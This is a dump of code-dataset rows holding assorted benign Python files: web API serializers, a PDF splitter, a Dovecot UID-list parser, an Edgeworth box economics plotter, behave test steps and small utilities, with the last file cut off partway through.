id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
1755327 | <gh_stars>1-10
# Copyright (C) 2017-2019 New York University,
# University at Buffalo,
# Illinois Institute of Technology.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains helper methods for the webservice that are used to
serialize workflow resources.
"""
from typing import TYPE_CHECKING, Dict, Any, Optional
if TYPE_CHECKING:
from vizier.engine.project.base import ProjectHandle
from vizier.viztrail.branch import BranchHandle
from vizier.viztrail.workflow import WorkflowHandle, WorkflowDescriptor
from vizier.api.routes.base import UrlFactory
import vizier.api.serialize.base as serialize
import vizier.api.serialize.labels as labels
import vizier.api.serialize.dataset as serialds
import vizier.api.serialize.hateoas as ref
import vizier.api.serialize.module as serialmd
def EMPTY_WORKFLOW_HANDLE(
project: "ProjectHandle",
branch: "BranchHandle",
urls: Optional[UrlFactory]
) -> Dict[str, Any]:
"""Dictionary serialization for a an empty workflow. Sets most values to
None or empty lists.
Parameters
----------
project: vizier.engine.project.base.ProjectHandle
Handle for the containing project
branch : vizier.viztrail.branch.BranchHandle
Branch handle
urls: vizier.api.routes.base.UrlFactory
Factory for resource urls
Returns
-------
dict
"""
project_id = project.identifier
branch_id = branch.identifier
ret:Dict[str,Any] = {
'id': None,
'createdAt': None,
'state': -1,
'modules': list(),
'datasets': list(),
'charts': list(),
'readOnly': False
}
if urls is not None:
ret[labels.LINKS] = WORKFLOW_HANDLE_LINKS(
project_id=project_id,
branch_id=branch_id,
urls=urls
)
return ret
def WORKFLOW_DESCRIPTOR(
project: "ProjectHandle",
branch: "BranchHandle",
workflow: "WorkflowDescriptor",
urls: Optional[UrlFactory]
) -> Dict[str, Any]:
"""Dictionary serialization for a workflow descriptor.
Parameters
----------
project: vizier.engine.project.base.ProjectHandle
Handle for the containing project
branch : vizier.viztrail.branch.BranchHandle
Branch handle
workflow: vizier.viztrail.workflow.WorkflowDescriptor
Workflow descriptor
urls: vizier.api.routes.base.UrlFactory
Factory for resource urls
Returns
-------
dict
"""
project_id = project.identifier
branch_id = branch.identifier
workflow_id = workflow.identifier
ret = {
'id': workflow_id,
'createdAt': workflow.created_at.isoformat(),
'action': workflow.action,
labels.COMMAND_PACKAGE: workflow.package_id,
labels.COMMAND_ID: workflow.command_id,
}
if urls is not None:
ret[labels.LINKS] = WORKFLOW_HANDLE_LINKS(
project_id=project_id,
branch_id=branch_id,
workflow_id=workflow_id,
urls=urls
)
return ret
def WORKFLOW_HANDLE(
project: "ProjectHandle",
branch: "BranchHandle",
workflow: "WorkflowHandle",
urls: Optional[UrlFactory]
) -> Dict[str, Any]:
"""Dictionary serialization for a workflow handle.
Parameters
----------
project: vizier.engine.project.base.ProjectHandle
Handle for the containing project
branch : vizier.viztrail.branch.BranchHandle
Branch handle
workflow: vizier.viztrail.workflow.WorkflowHandle
Workflow handle
urls: vizier.api.routes.base.UrlFactory
Factory for resource urls
Returns
-------
dict
"""
project_id = project.identifier
branch_id = branch.identifier
workflow_id = workflow.identifier
descriptor = workflow.descriptor
read_only = (branch.get_head().identifier != workflow_id)
# Create lists of module handles and dataset handles
modules = list()
datasets = dict()
dataset_names = list()
dataobjects = dict()
charts = dict()
for m in workflow.modules:
if not m.provenance.charts is None:
for chart_name, chart in m.provenance.charts:
charts[chart_name] = chart
available_charts = list()
# Only include charts for modules that completed successful
for artifact in m.artifacts:
if artifact.is_dataset:
datasets[artifact.identifier] = serialds.DATASET_DESCRIPTOR(
dataset=artifact,
project=project,
urls=urls
)
dataset_names.append(artifact.name)
else:
dataobjects[artifact.identifier] = serialds.ARTIFACT_DESCRIPTOR(
artifact=artifact,
project=project,
urls=urls
)
if m.is_success:
for c_handle in list(charts.values()):
if c_handle.dataset_name in dataset_names:
available_charts.append(c_handle)
modules.append(
serialmd.MODULE_HANDLE(
project=project,
branch=branch,
workflow=workflow,
module=m,
charts=available_charts,
urls=urls,
include_self=(not read_only)
)
)
handle_links: Optional[Dict[str,Optional[str]]] = None
if workflow.is_active and urls is not None:
handle_links = {
ref.WORKFLOW_CANCEL: urls.cancel_workflow(
project_id=project_id,
branch_id=branch_id
)
}
links = {}
if urls is not None:
links = { labels.LINKS : WORKFLOW_HANDLE_LINKS(
project_id=project_id,
branch_id=branch_id,
workflow_id=workflow_id,
urls=urls,
links=handle_links
)}
return {
'id': workflow_id,
'createdAt': descriptor.created_at.isoformat(),
'action': descriptor.action,
labels.COMMAND_PACKAGE: descriptor.package_id,
labels.COMMAND_ID: descriptor.command_id,
'state': workflow.get_state().state,
'modules': modules,
'datasets': list(datasets.values()),
'dataobjects': list(dataobjects.values()),
'readOnly': read_only,
**links
}
def WORKFLOW_HANDLE_LINKS(
urls: UrlFactory,
project_id: str,
branch_id: str,
workflow_id: Optional[str] = None,
links: Optional[Dict[str,Optional[str]]] = None):
"""Get basic set of HATEOAS references for workflow handles.
For an empty workflow the identifier is None. In that case the result will
not contain a self reference.
Parameters
----------
urls: vizier.api.routes.base.UrlFactory
Factory for resource urls
project_id: string
Unique project identifier
branch_id: string
Unique branch identifier
workflow_id: string, optional
Unique workflow identifier
Returns
-------
dict
"""
if links is None:
links = dict()
links[ref.WORKFLOW_APPEND] = urls.workflow_module_append(
project_id=project_id,
branch_id=branch_id
)
# References to the workflow branch
links[ref.WORKFLOW_BRANCH] = urls.get_branch(
project_id=project_id,
branch_id=branch_id
)
links[ref.BRANCH_HEAD] = urls.get_branch_head(
project_id=project_id,
branch_id=branch_id
)
links[ref.WORKFLOW_PROJECT] = urls.get_project(project_id)
links[ref.FILE_UPLOAD] = urls.upload_file(project_id)
# Only include self reference if workflow identifier is given
if not workflow_id is None:
links[ref.SELF] = urls.get_workflow(
project_id=project_id,
branch_id=branch_id,
workflow_id=workflow_id
)
return serialize.HATEOAS(links)
| StarcoderdataPython |
3356402 | <gh_stars>1-10
from rest_framework import serializers
from rest_framework_gis import serializers
from rest_framework.serializers import CharField
from origin_destination_api.models import OriginDestination, ResidenceAreaCharacteristics, WorkplaceAreaCharacteristics, Xwalk
class OriginDestinationSerializer(serializers.ModelSerializer):
class Meta:
model = OriginDestination
fields = '__all__'
class ResidenceAreaCharacteristicsSerializer(serializers.ModelSerializer):
class Meta:
model = ResidenceAreaCharacteristics
fields = '__all__'
class WorkplaceAreaCharacteristicsSerializer(serializers.ModelSerializer):
class Meta:
model = WorkplaceAreaCharacteristics
fields = '__all__'
#
class XwalkSerializer(serializers.GeoFeatureModelSerializer):
class Meta:
model = Xwalk
fields = '__all__'
geo_field = 'geom_intpt_4326'
id = 'tabblk2010'
| StarcoderdataPython |
1799836 | <reponame>josuerojasq/netacad_python
#El método "islower()" es una variante de "isalpha()" - solo acepta letras minúsculas.
print("Moooo".islower())
print('moooo'.islower()) | StarcoderdataPython |
3237210 | <reponame>dk107dk/cdocs<filename>setup.py
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="cdocs",
version="0.0.38",
author="<NAME>",
author_email="<EMAIL>",
description="Cdocs is a super simple contextual help library",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/dk107dk/cdocs",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
| StarcoderdataPython |
1761105 | # $ pip install pypdf2
# http://note.mokuzine.net/python-pdf-split/
# https://docs.python.jp/3/library/pathlib.html
# https://qiita.com/amowwee/items/e63b3610ea750f7dba1b
# https://blanktar.jp/blog/2015/07/python-pathlib.html
import pathlib
from PyPDF2 import PdfFileWriter, PdfFileReader
def main():
split('ap')
split('koudo')
def split(issue_type):
parent_dir = pathlib.Path(__file__).resolve().parent
from_dir = parent_dir.joinpath('issues').joinpath(issue_type)
to_dir = parent_dir.joinpath('split_issues').joinpath(issue_type)
if not to_dir.exists():
to_dir.mkdir(parents=True)
# 変換元ディレクトリに存在するファイル一覧を取得
issues = list(from_dir.glob('*'))
for issue in issues:
with issue.open('rb') as r:
source = PdfFileReader(r, strict=False)
total_pages = source.getNumPages()
for i in range(0, total_pages):
output = PdfFileWriter()
output.addPage(source.getPage(i))
export_path = to_dir.joinpath(f'{issue.stem}_{i + 1}.pdf')
with export_path.open('wb') as w:
output.write(w)
if __name__ == '__main__':
main()
| StarcoderdataPython |
1794486 |
import hashlib
import struct
from collections import OrderedDict
from typing import IO, Any, Optional, Iterable, Mapping, Dict, \
NamedTuple, ClassVar, TypeVar, Type
from pymap.mailbox import MailboxSnapshot
from .io import FileWriteable
__all__ = ['Record', 'UidList']
_UDT = TypeVar('_UDT', bound='UidList')
class Record(NamedTuple):
"""Defines a single record read from the UID list file.
Args:
uid: The message UID of the record.
fields: The metadata fields of the record.
filename: The filename of the record.
"""
uid: int
fields: Mapping[str, Any]
filename: str
@property
def key(self) -> str:
"""The :class:`~mailbox.Maildir` key value."""
return self.filename.split(':', 1)[0]
class UidList(FileWriteable):
"""Maintains the file with UID mapping to maildir files.
Args:
base_dir: The directory of the file.
uid_validity: The UID validity value.
next_uid: The next assignable message UID value.
global_uid: The 128-bit global mailbox UID.
"""
#: The UID list file name, stored in the mailbox directory.
FILE_NAME: ClassVar[str] = 'dovecot-uidlist'
#: The UID list lock file, stored adjacent to the UID list file.
LOCK_FILE: ClassVar[str] = 'dovecot-uidlist.lock'
def __init__(self, base_dir: str, uid_validity: int,
next_uid: int, global_uid: bytes = None) -> None:
super().__init__()
self._base_dir = base_dir
self.uid_validity = uid_validity
self.next_uid = next_uid
self.global_uid = global_uid or self._create_guid(base_dir)
self._records: Dict[int, Record] = OrderedDict()
@property
def records(self) -> Iterable[Record]:
"""The records contained in the UID list file."""
return self._records.values()
def get(self, uid: int) -> Record:
"""Get a single record by its UID.
Args:
uid: The message UID.
Raises:
KeyError: The UID does not exist.
"""
return self._records[uid]
def get_all(self, uids: Iterable[int]) -> Mapping[int, Record]:
"""Get records by a set of UIDs.
Args:
uids: The message UIDs.
"""
return {uid: self._records[uid] for uid in uids
if uid in self._records}
def set(self, rec: Record) -> None:
"""Add or update the record in the UID list file."""
self._records[rec.uid] = rec
def remove(self, uid: int) -> None:
"""Remove the record from the UID list file.
Raises:
KeyError: The UID does not exist.
"""
del self._records[uid]
@classmethod
def _build_line(cls, rec: Record) -> str:
parts = ['%d' % rec.uid]
for key, val in sorted(rec.fields.items()):
parts.append(' ')
parts.append(key[0:1])
parts.append(str(val))
parts.append(' :')
parts.append(rec.filename)
parts.append('\r\n')
return ''.join(parts)
@classmethod
def _read_line(cls, line: str) -> Record:
before, filename = line.split(':', 1)
fields: Dict[str, str] = {}
data = before.split(' ')
num = int(data[0])
for col in data[1:]:
if col:
fields[col[0]] = col[1:]
return Record(num, fields, filename.rstrip())
@classmethod
def _read_guid_hex(cls, field: str) -> bytes:
split = int(len(field) / 2)
left, right = int(field[0:split], 16), int(field[split:], 16)
return struct.pack('=QQ', left, right)
@classmethod
def _read_header(cls: Type[_UDT], base_dir: str, line: str) -> _UDT:
data = line.split()
if data[0] != '3':
raise ValueError(line)
uid_validity: Optional[int] = None
next_uid: Optional[int] = None
global_uid: Optional[bytes] = None
for field in data[1:]:
if field[0] == 'V':
uid_validity = int(field[1:])
elif field[0] == 'N':
next_uid = int(field[1:])
elif field[0] == 'G':
global_uid = cls._read_guid_hex(field[1:])
if uid_validity is None or next_uid is None or global_uid is None:
raise ValueError(line)
return cls(base_dir, uid_validity, next_uid, global_uid)
def _create_guid(self, base_dir: str) -> bytes:
ret = hashlib.sha256()
ret.update(base_dir.encode('utf-8', 'replace'))
ret.update(struct.pack('=L', self.uid_validity))
return ret.digest()[0:16]
def _get_guid_hex(self) -> str:
left, right = struct.unpack('=QQ', self.global_uid)
return format(left, 'x') + format(right, 'x')
def _build_header(self) -> str:
return ''.join(['3 V', str(self.uid_validity),
' N', str(self.next_uid),
' G', self._get_guid_hex(), '\r\n'])
@classmethod
def get_file(cls) -> str:
return cls.FILE_NAME
@classmethod
def get_lock(cls) -> str:
return cls.LOCK_FILE
def get_dir(self) -> str:
return self._base_dir
@classmethod
def get_default(cls: Type[_UDT], base_dir: str) -> _UDT:
return cls(base_dir, MailboxSnapshot.new_uid_validity(), 1)
def write(self, fp: IO[str]) -> None:
fp.write(self._build_header())
for rec in self.records:
fp.write(self._build_line(rec))
@classmethod
def open(cls: Type[_UDT], base_dir: str, fp: IO[str]) -> _UDT:
header = fp.readline()
ret = cls._read_header(base_dir, header)
return ret
def read(self, fp: IO[str]) -> None:
for line in fp:
self.set(self._read_line(line))
| StarcoderdataPython |
4834770 | <filename>sample.py<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import numpy as np
c = np.array([[1,2,3,4],[5,6,7,8],[9,8,7,6]],int)
type(c)
# In[2]:
c
# In[3]:
c[1,1]
# In[4]:
c[2,3]
# In[5]:
c[2,0]
# In[6]:
k=c.reshape(4,3)
# In[7]:
k
# In[8]:
c.ndim
# In[10]:
c.shape
# In[4]:
import pandas as pd
# In[6]:
import numpy as np
a=np.arange(5)
# In[7]:
a
# In[8]:
a=np.ones([3,3])
# In[9]:
a
# In[10]:
import numpy as np
a=np.arange(5)
# In[11]:
a1=np.ones([3,2])
# In[12]:
a1
# In[ ]:
| StarcoderdataPython |
144683 | import numpy as np
import matplotlib.pyplot as plt
from math import sqrt, copysign
from scipy.optimize import brenth
from scipy.optimize import fsolve,fmin_l_bfgs_b,fmin_cg,fminbound
"""
sign of the number
"""
def sign(x):
if x==0:
return 0
else:
return copysign(1,x)
"""
if function f can't be computed, return None
"""
def f_None(f,x):
try:
return f(x)
except:
return None
"""
if the bound was touched returns None
L is the level of the function f
"""
def correct(x,y,f,L):
eps=10e-5
if abs(f(x,y)-L)>eps:
return None
else:
return y
"""
if output can't be produced, return 0, if there's division by zero, then it looks for the limit and returns it
"""
def _(f,*x):
try:
out=f(*x)
if out is None:
return float("inf")
else:
return out
except ZeroDivisionError:
l=len(x)
eps=abs(f(*[1e-02]*l)-f(*[1e-04]*l))
if abs(f(*[1e-04]*l)-f(*[1e-06]*l))<eps and abs(f(*[1e-06]*l)-f(*[1e-08]*l))<eps:
return f(*[1e-10]*l)
else:
return sign(f(*[1e-10]*l))*float("inf")
"""
produces the array of the first items of the element of the array
"""
def fst(X):
return list(map(lambda x: x[0],X))
"""
produces the array of the second items of the element of the array
"""
def snd(X):
return list(map(lambda x: x[1],X))
"""
unpacks [(X_1,Y_1),...,(X_k,Y_k),...,(X_n,Y_n)] into [(X_1,...,X_k,...,X_n),(Y_1,...,Y_k,...,Y_n)]
"""
def unpack(X):
return [fst(X),snd(X)]
"""
find the root of the function. If the ends of the interval have the same signs, try to make it smaller
"""
def rootalt(f,a,b):
eps=(b-a)/64.0
turn=0
N_iter=10
while abs(a-b)>eps and N_iter > 0:
N_iter-=1
try:
#return fmin_cg(f,(a+b)/2.0)[0]
return brenth(f,a,b)
except ValueError:
if turn==0:
a=a+eps
turn=1
else:
b=b+eps
turn=0
#return root2(f,a,b)
return None
def root(f,a,b):
a_init=a
b_init=b
eps=(b-a)/16.0
turn=0
N_iter=12
while abs(a-b)>eps and N_iter > 0 and f(a)*f(b)>0:
N_iter-=1
if turn==0:
a=a+eps
turn=1
else:
b=b-eps
turn=0
try:
return brenth(f,a,b)
except ValueError:
return fminbound(f,a_init,b_init)
def root2(f,a,b):
return fmin_cg(f,(a+b)/2.0,disp=False)[0]
def root3(f,a,b):
return fmin_l_bfgs_b(func=f,x0=(a+b)/2,bounds=[a,b])
"""
2-point numerical derivative
"""
def prime(f,dt=10e-3):
return lambda x: (f(x+dt)-f(x-dt))/(2*dt)
"""
Marginal rate of substitution of a utility function u(.)
"""
def MRS(u):
u_x=lambda x,y: prime(lambda z: u(z,y))(x)
u_y=lambda x,y: prime(lambda z: u(x,z))(y)
return lambda x,y: u_x(x,y)/u_y(x,y)
"""
Edgeworth Box parameter determine that to show on the plot
"""
class EdgeBoxParameter:
#def __init__(self,pareto,core,U1,U2,endow,walras,budget,N):
#boll_array=[pareto,core,U1,U2,endow,walras,budget]
def __init__(self,N,pareto=True,core=True,eq=True,budget=True):
self.N=N
self.pareto=pareto
self.core=core
self.eq=eq
self.budget=budget
defaultEBP=EdgeBoxParameter(100)
class EdgeBox():
def __init__(self,u1,u2,IE1,IE2,EBP=defaultEBP):
self.core=0
self.pareto=0
self.eq=0
self.p=[None,1]
self.p_weighted=[None,None]
self.u1=u1
self.u2=u2
self.u2_compl=lambda x,y: u2(self.IE[0]-x,self.IE[1]-y)
self.IE1=IE1
self.IE2=IE2
self.IE=[IE1[0]+IE2[0],IE1[1]+IE2[1]]
self.EBP=EBP
self.dt=min(self.IE)/float(EBP.N)
self.X=np.linspace(self.dt,self.IE[0]-self.dt,EBP.N)
self.Y=np.linspace(self.dt,self.IE[1]-self.dt,EBP.N)
self.calc_init()
self.calc()
def calc(self):
"""
calculate all solutions of the box
"""
self.calc_pareto()
self.calc_core()
self.calc_eq()
self.calc_budget()
def calc_init(self):
self.u1(*self.IE1)
self.UIE1=self.u1(*self.IE1) # utility of the 1-st player at her initial endowment
self.UIE2=self.u2(*self.IE2) # utility of the 2-nd player at her initial endowment
self.u_ie_1=lambda x: root(lambda y: self.u1(x,y)-self.UIE1,self.Y[0],self.Y[-1]) # utility function at initial endowment of the 1-st participant
self.u_ie_2=lambda x: root(lambda y: self.u2(x,y)-self.UIE2,self.Y[0],self.Y[-1]) # utility function at initial endowment of the 2-nd participant
self.u_ie_2_compl=lambda x: -self.u_ie_2(self.IE[0]-x)+self.IE[1] # utility function at initial endowment of the 2-nd participant in terms of the 1-st
U1 = list(map(lambda x: correct(x,f_None(self.u_ie_1,x),self.u1,self.UIE1),self.X))
U2 = list(map(lambda x: correct(x,f_None(self.u_ie_2_compl,x),self.u2_compl,self.UIE2),self.X))
self.U1 = list(filter(lambda x: x[0] is not None and x[1] is not None,zip(self.X,U1)))
self.U2 = list(filter(lambda x: x[0] is not None and x[1] is not None,zip(self.X,U2)))
U1_sort = sorted(self.U1,key=lambda x: x[1])
U2_sort = sorted(self.U2,key=lambda x: x[1])
if len(U1_sort)>0:
self.U1_min=U1_sort[0]
self.U1_max=U1_sort[-1]
else:
self.U1_min=None
self.U1_max=None
if len(U2_sort)>0:
self.U2_min=U2_sort[0]
self.U2_max=U2_sort[-1]
else:
self.U2_min=None
self.U2_max=None
self._B=lambda x,y,p: y-(p*(self.IE1[0]-x)+self.IE1[1]) # budget constraint
def calc_pareto(self):
self.MRS1=MRS(self.u1) # marginal rate of substitution of the 1st participant
self.MRS2=MRS(self.u2) # marginal rate of substitution of the 2nd participant
self._pareto=lambda x: root(lambda y: _(self.MRS1,x,y)-_(self.MRS2,self.IE[0]-x,self.IE[1]-y),self.Y[0],self.Y[-1]) # Pareto solutions in functional form
P = list(map(lambda x: f_None(self._pareto,x),self.X[1:-1]))
self.PARETO=list(zip(self.X[1:-1],P)) # set of some Pareto solution points (enough to draw it)
self._Bx=lambda x: root(lambda y: self._B(x,y,self.MRS1(x,y)),self.Y[0],self.Y[-1])
#plot_pareto,=plt.plot(X,P,linewidth=2)
PU1_X=root(lambda x: _(self._pareto,x)-_(self.u_ie_1,x),self.U1_min[0],self.U1_max[0])
PU2_X=root(lambda x: _(self._pareto,x)-_(self.u_ie_2_compl,x),self.U2_min[0],self.U2_max[0])
PU1_Y=self.u_ie_1(PU1_X)
PU2_Y=self.u_ie_2_compl(PU2_X)
self.PU1=[PU1_X,PU1_Y]
self.PU2=[PU2_X,PU2_Y]
self._Bx=lambda x: root(lambda y: _(self._B,x,y,_(self.MRS1,x,y)),self.Y[0],self.Y[-1])
def calc_core(self):
CORE_X = list(filter(lambda x: x>=self.PU1[0] and x<=self.PU2[0], self.X))
CORE_Y = list(map(lambda x: self._pareto(x), CORE_X))
self.CORE = list(zip(CORE_X,CORE_Y)) # set of some solutions in the core (could be one, could be many or none)
def calc_eq(self):
EQ_X1=root(lambda x: _(self._pareto,x)-_(self._Bx,x),self.PU1[0],self.PU2[0])
EQ_Y1=self._pareto(EQ_X1)
EQ_X2=self.IE[0]-EQ_X1
EQ_Y2=self.IE[1]-EQ_Y1
self.EQ1=[EQ_X1,EQ_Y1] # equilibrium solution for the 1st participant
self.EQ2=[EQ_X2,EQ_Y2] # equilibrium solution for the 2nd participant
self.p=self.MRS1(*self.EQ1) # price vector
self.p_weighted=[self.p/(self.p+1),1/(self.p+1)]
self.UEQ1=self.u1(*self.EQ1) # value of utility function of the 1st participant at her equilibrium point (functional form)
self.UEQ2=self.u2(*self.EQ2) # value of utility function of the 2nd participant at her equilibrium point (functional form)
self.u_eq_1=lambda x: root(lambda y: self.u1(x,y)-self.UEQ1,self.Y[0],self.Y[-1])
self.u_eq_2=lambda x: root(lambda y: self.u2(x,y)-self.UEQ2,self.Y[0],self.Y[-1])
self.u_eq_2_compl=lambda x: -self.u_eq_2(self.IE[0]-x)+self.IE[1]
U1_EQ = list(map(lambda x: correct(x,f_None(self.u_eq_1,x),self.u1,self.UEQ1),self.X))
U2_EQ = list(map(lambda x: correct(x,f_None(self.u_eq_2_compl,x),self.u2_compl,self.UEQ2),self.X))
self.U1_EQ = list(filter(lambda x: x[0] is not None and x[1] is not None,zip(self.X,U1_EQ)))
self.U2_EQ = list(filter(lambda x: x[0] is not None and x[1] is not None,zip(self.X,U2_EQ)))
def calc_budget(self,price=None):
if price is None:
price=self.p
self.Bp=lambda x: price*self.IE1[0]+self.IE1[1]-price*x # budget line (functional form)
Budget = list(map(self.Bp,self.X)) # set of some points from the budget line
self.BUDGET = list(zip(self.X,Budget))
def plot(self,fname=None):
plot_endow,=plt.plot(self.IE1[0],self.IE1[1],color="white",marker="o")
m=max(self.IE[0],self.IE[1])
plt.axis([0,m,0,m],autoscale=False)
plot_U1,=plt.plot(*unpack(self.U1),color="blue")
plot_U2,=plt.plot(*unpack(self.U2),color="brown")
plot_pareto,=plt.plot(*unpack(self.PARETO),linewidth=2,color="red")
plot_core,=plt.plot(*unpack(self.CORE),color="black",linewidth=4)
plot_U1_EQ,=plt.plot(*unpack(self.U1_EQ),ls='--',color="blue")
plot_U2_EQ,=plt.plot(*unpack(self.U2_EQ),ls='--',color="brown")
plot_budget,=plt.plot(*unpack(self.BUDGET),color="green")
plt.plot(self.PU1[0],self.PU1[1],color="blue",marker="o")
plt.plot(self.PU2[0],self.PU2[1],color="brown",marker="o")
plot_walras,=plt.plot(self.EQ1[0],self.EQ1[1],color="green",marker="o")
# annotation
plt.annotate("(%s;%s)"%(round(self.EQ1[0],2),round(self.EQ1[1],2)), xy=self.EQ1, xytext=(self.EQ1[0]+self.dt,self.EQ1[1]-self.dt))
plt.title("Edgeworth Box")
plt.legend([plot_pareto,plot_U1,plot_U2,plot_endow,plot_core,plot_walras,plot_budget,plot_U1_EQ,plot_U2_EQ]
,["Pareto","U1 before trade","U2 before trade","Init. endow.","Core","Equilibrium","Budget constraint","U1 at eq.","U2 at eq."])
#Axes Dscription
plt.xlabel("Units of 1-st good")
plt.ylabel("Units of 2-nd good")
if fname is not None:
plt.savefig(fname)
plt.close()
else:
plt.show(block=False)
| StarcoderdataPython |
3373620 | <gh_stars>1-10
import io
import pathlib
import numpy as np
import yaml
from matplotlib import pyplot
import functools
import inspect
import warnings
def yaml_load(s: str):
return yaml.load(s, Loader=yaml.BaseLoader)
def yaml_dump(obj: any):
return yaml.dump(obj, default_flow_style=False)
def overlay_image_green(result: np.ndarray,
base: np.ndarray,
overlay: np.ndarray,
base_factor: float):
"""
#### Overlays a map on an image
"""
result[:, :, 0] = base * base_factor
result[:, :, 1] = base * base_factor
result[:, :, 2] = base * base_factor
result[:, :, 1] += (1 - base_factor) * 255 * overlay / (np.max(overlay) - np.min(overlay))
def create_png(frame: np.ndarray):
"""
#### Create a PNG from a numpy array.
"""
png = io.BytesIO()
pyplot.imsave(png, frame, format='png', cmap='gray')
return png
def rm_tree(path_to_remove: pathlib.Path):
if path_to_remove.is_dir():
for f in path_to_remove.iterdir():
if f.is_dir():
rm_tree(f)
else:
f.unlink()
path_to_remove.rmdir()
else:
path_to_remove.unlink()
def deprecated(message: str):
"""
Mark a class, a function or a class method as deprecated.
"""
def decorator(deprecated_obj):
if inspect.isclass(deprecated_obj):
warning_msg = f"Deprecated class [{deprecated_obj.__name__}]: {message}"
else:
warning_msg = f"Deprecated function [{deprecated_obj.__name__}]: {message}"
warned = dict(value=False)
@functools.wraps(deprecated_obj)
def new_func(*args, **kwargs):
if not warned['value']:
warnings.simplefilter('always', DeprecationWarning)
warnings.warn(
warning_msg,
category=DeprecationWarning,
stacklevel=2
)
warnings.simplefilter('default', DeprecationWarning)
warned['value'] = True
return deprecated_obj(*args, **kwargs)
return new_func
return decorator
| StarcoderdataPython |
1723890 | from germanium.static import *
from germanium.locators import StaticElementLocator
from behave import *
from features.steps.asserts import *
use_step_matcher("re")
@step(u'I search using S for (?P<locator>.*)')
def step_impl(context, locator):
print("Search for locator: %s" % locator)
S(locator).exists()
@step(u"the selector '(.*?)' exists somewhere")
def step_impl(context, selector):
assert S(selector).exists(only_visible=False)
@step(u"the selector '(.*?)' exists and is visible")
def step_impl(context, selector):
assert S(selector).exists()
@step(u"the selector '(.*?)' doesn't exists at all")
def step_impl(context, selector):
assert S(selector).not_exists(only_visible=False)
@step(u"the selector '(.*?)' doesn't exists as visible")
def step_impl(context, selector):
assert Css(selector).not_exists()
@step(u'nothing happens')
def step_impl(context):
pass
@step(u"I search using a nested locator for '(.*?)'")
def step_impl(context, selector):
element = S(S(selector)).element()
context.found_element = element
@step(u"I search using a callable that returns a CssSelector '(.*?)'")
def step_impl(context, selector):
def fn():
return Css(selector)
element = S(fn).element()
context.found_element = element
@step(u"I search for the 3rd element that is an 'input'")
def step_impl(context):
element = S('input').element_list(2)
context.found_element = element
@step(u"I create a StaticElementLocator with a single element: (.*?)")
def step_impl(context, selector):
element = S(selector).element()
context.static_element_locator = StaticElementLocator(get_germanium(), element)
@step(u"the StaticElementLocator has one element")
def step_impl(context):
assert_true(context.static_element_locator, "The static element locator is not found. "
"Call first: I create a StaticElementLocator with a single element")
locator = context.static_element_locator
assert_true(locator.element())
@step(u"the StaticElementLocator has no elements anymore")
def step_impl(context):
assert_true(context.static_element_locator, "The static element locator is not found. "
"Call first: I create a StaticElementLocator with a single element")
locator = context.static_element_locator
assert_false(locator.element())
| StarcoderdataPython |
3342121 | def is_associate_or_consultant_to_pipeline(user, pipeline):
"""Check if a user is an assocaite or consulant of a
pipeline record.
"""
# if user no employee assigned, then not allowed
employee = getattr(user, 'as_employee', None)
if not employee:
return False
associate_id = pipeline.job_candidate.associate_id
if associate_id:
print(associate_id, employee.pk)
if associate_id == employee.pk:
return True
consultant_id = pipeline.job_candidate.consultant_id
if consultant_id:
print(consultant_id, employee.pk)
if consultant_id == employee.pk:
return True
return False
def is_allowed_to_view_or_edit_pipeline(user, pipeline):
"""Return True if user has permission to view all Pipelines
OR is an associate or consultant of the Pipeline.
"""
if user.has_perm('salespipes.view_all_pipelines'):
return True
return is_associate_or_consultant_to_pipeline(user, pipeline)
| StarcoderdataPython |
195410 | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class DceNodeMacGroups(Base):
"""Sets the DCE Node MAC Groups for a particular DCE ISIS Network Range.
The DceNodeMacGroups class encapsulates a list of dceNodeMacGroups resources that are managed by the user.
A list of resources can be retrieved from the server using the DceNodeMacGroups.find() method.
The list can be managed by using the DceNodeMacGroups.add() and DceNodeMacGroups.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'dceNodeMacGroups'
_SDM_ATT_MAP = {
'IncludeMacGroups': 'includeMacGroups',
'InterGroupUnicastMacIncrement': 'interGroupUnicastMacIncrement',
'IntraGroupUnicastMacIncrement': 'intraGroupUnicastMacIncrement',
'MulticastAddressNodeStep': 'multicastAddressNodeStep',
'MulticastMacCount': 'multicastMacCount',
'MulticastMacStep': 'multicastMacStep',
'NoOfUnicastScrMacsPerMulicastMac': 'noOfUnicastScrMacsPerMulicastMac',
'SourceGroupMapping': 'sourceGroupMapping',
'StartMulticastMac': 'startMulticastMac',
'StartUnicastSourceMac': 'startUnicastSourceMac',
'UnicastAddressNodeStep': 'unicastAddressNodeStep',
'VlanId': 'vlanId',
}
def __init__(self, parent):
